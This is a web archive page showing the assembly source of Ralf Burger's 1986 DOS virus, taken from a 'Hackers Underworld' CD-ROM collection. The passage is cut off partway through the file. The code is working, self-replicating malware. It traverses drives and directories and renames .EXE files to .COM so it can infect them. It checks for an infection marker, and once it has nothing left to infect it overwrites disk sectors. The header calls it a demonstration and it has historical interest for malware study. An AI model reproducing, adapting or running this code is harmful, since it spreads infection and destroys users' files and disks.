home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
BURGER.ASM
< prev
next >
Wrap
Assembly Source File
|
1994-07-17
|
15KB
|
448 lines
page 70,120
Name VIRUS
;*************************************************************************
; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
;*************************************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;*************************************************************************
; The three NOP's serve as the marker byte of the
; virus which will allow it to identify a virus
;*************************************************************************
MAIN:
nop
nop
nop
;*************************************************************************
; Initialize the pointers
;*************************************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;*************************************************************************
; Get the selected drive
;*************************************************************************
mov ah,19h ; drive?
int 21h
;*************************************************************************
; Get the current path on the current drive
;*************************************************************************
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov dh,0
add al,1
mov dl,al ; in actual drive
lea si,cs:old_path
int 21h
;*************************************************************************
; Get the number of drives present.
; If only one drive is present, the pointer for
; search order will be set to search order + 6
;*************************************************************************
mov ah,0eh ; how many disks
mov dl,0 ;
int 21h
mov al,01
cmp al,01 ; one drive?
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;*************************************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM file and infected.
; This causes the error message "Program too lrage
; to fit in memory" when starting larger infected
; EXE programs.
;*************************************************************************
change_disk:
jnc no_name_change
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ; .EXE found?
;*************************************************************************
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
;*************************************************************************
mov ah,2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
;*************************************************************************
; Check if the end of the search order table has been
; reached. If so, end.
;*************************************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;*************************************************************************
; Get new drive from search order table and
; select it.
;*************************************************************************
hups2:
mov ah,0eh
int 21h ; change disk
;*************************************************************************
; Start in the root directory
;*************************************************************************
mov ah,3bh ; change path
lea dx,path
int 21h
jmp find_first_file
;*************************************************************************
; Starting from the root, search for the first subdir
; First convert all .EXE files to .COM in the old
; directory.
;*************************************************************************
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ; use root dir
lea dx,path
int 21h
mov ah,04eh ;Search for first subdirectory
mov cx,00010001b ; dir mask
lea dx,maske_dir
int 21h
jc change_disk
mov bx,CS:counter
INC BX
DEC bx
jz use_next_subdir
;*************************************************************************
; Search for the next subdir. If no more directories
; are found, the drive will be changed.
;*************************************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************************************
; Select found directory
;*************************************************************************
use_next_subdir:
mov ah,2fh ; get dta address
int 21h
add bx,1ch
mov es:[bx],'\ ' ; address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ; change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;*************************************************************************
; Find first .COM file in the current directory.
; If there are non, search the next directory.
;*************************************************************************
find_first_file:
mov ah,04eh ; Search for first
mov cx,00000001b ; mask
lea dx,maske_com ;
int 21h
jc find_first_subdir
jmp check_if_ill
;*************************************************************************
; If the program is already infected, search for
; the next program.
;*************************************************************************
find_next_file:
mov ah,4fh ; search for next
int 21h
jc find_first_subdir
;*************************************************************************
; Check if already infected by the virus.
;*************************************************************************
check_if_ill:
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
mov bx,ax ; save channel
mov ah,3fh ; read file
mov cx,buflen ;
mov dx,buffer ; write in buffer
int 21h
mov ah,3eh ; CLODE FILE
int 21h
;****************************************************